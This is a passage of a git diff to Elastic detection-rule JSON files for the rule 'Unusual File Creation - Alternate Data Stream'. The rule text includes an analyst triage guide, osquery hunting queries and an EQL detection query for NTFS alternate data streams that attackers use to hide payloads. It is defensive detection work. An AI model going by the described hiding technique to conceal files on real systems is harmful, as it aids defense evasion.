NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json index e008b2d91fe..90f14892863 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json index 31710a22168..90488b42801 100644 --- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse 